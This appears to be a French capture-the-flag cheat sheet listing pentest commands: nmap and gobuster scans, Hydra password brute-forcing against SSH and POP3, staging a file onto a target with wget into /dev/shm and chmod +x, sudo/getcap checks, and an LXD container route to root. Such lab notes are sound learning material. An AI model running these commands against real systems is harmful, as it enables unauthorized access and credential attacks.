Outils

Outils utilisés dans la résolution des challenges.

1. nmap

Pour trouver et explorer la liste des ports ouverts

nmap $IP -A -p- -oN nmap.txt -T4

2. gobuster

Pour trouver la liste des répertoires et différents fichiers importants

gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x ".php,.html,.txt,.zip" -u $IP -t50
gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x ".php,.html,.txt,.zip" -u http://$IP:8080 -t50 -U <user> -P <password>

3. Hydra

  • Hydra pour ssh

hydra -l <user>  -P /usr/share/wordlists/rockyou.txt ssh://$IP:22 -t 64
  • Hydra pour pop3

hydra -l <user>  -P /usr/share/wordlists/rockyou.txt pop3://$IP -s <port> -t 64

ou

hydra -l <user>  -P /usr/share/wordlists/fasttrack.txt pop3://$IP -s <port> -t 64 
  • Hydra pour http-get

4. Pspy64

Permet de trouver les process cron exécutés par root sans avoir les droits de root

https://github.com/DominicBreuker/pspy

5. Transfert de fichiers

Pour transférer des fichiers depuis la machine Kali vers la machine cible:

  1. sur la machine Kali

    1. aller dans le répertoire contenant les fichiers à transférer

    2. python3 -m http.server

  2. sur la machine cible

    1. aller dans le répertoire /dev/shm

    2. wget < kali tun0 IP>:8000/fichier.à.transférer

    3. rendre les fichiers exécutables avec chmod +x

6. Privilege Escalation

Voici la méthode générique que j'utilise pour trouver les possibilités de 'privilege escalation'. Cette méthode est en partie basée sur l'article Linux Privilege Escalation: Automated Script.

  1. sudo -l

  2. getcap -r / 2>/dev/null

7. Consolidation d'un Shell

8. Escalade de privilèges via LXD

Basé sur cet article: LXC/LXD (Linux Container/Daemon) Privilege Escalation

Vérifiez que l'utilisateur sur la machine cible fait partie du groupe lxd

8.1 Sur la machine Kali

Préparez un conteneur linux et lancer un serveur http

8.2 Sur la machine cible

Téléchargez le fichier <alpine tar.gz> et importez-le comme image dans LXC

Créez un nouveau conteneur 'mycontainer' basé sur l'image 'myimage' qui vient d'être importée.

En cas de message No storage pool found. Please create a new storage pool.” initialisez LXD d'abord et relancez la commande.

Montez (mount) le répertoire principal / dans le répertoire /mnt/root du conteneur 'mycontainer' que vous venez de créer

Démarrez votre conteneur

Lancez un Shell (note: l'image Alpine ne supporte qu'un shell sh)

Vérifiez que vous êtes bien root

Rendez-vous dans le répertoire principal de la machine cible monté en /mnt/root et accédez en tant que root à toutes les données de la machine

9. Outils Stéganographie

Pour trouver le mot de passe et extraire le fichier caché

Voici un lien vers une liste d'outils de stéganographie que j'utilise souvent

https://medium.com/@ria.banerjee005/steganography-tools-techniques-bba3f95c7148

On y retrouve notamment strings, steghide, stegseek et autres exiftools

10. WPscan

https://blog.sucuri.net/2023/12/wpscan-intro-how-to-scan-for-wordpress-vulnerabilities.html

11. FFUF

ffuf permet de trouver les sous-domaines d'un site donné

un exemple pratique dans la vidéo https://www.youtube.com/watch?v=AnJiRY3g5sg

12. Sites intéressants

Mis à jour

Ce contenu vous a-t-il été utile ?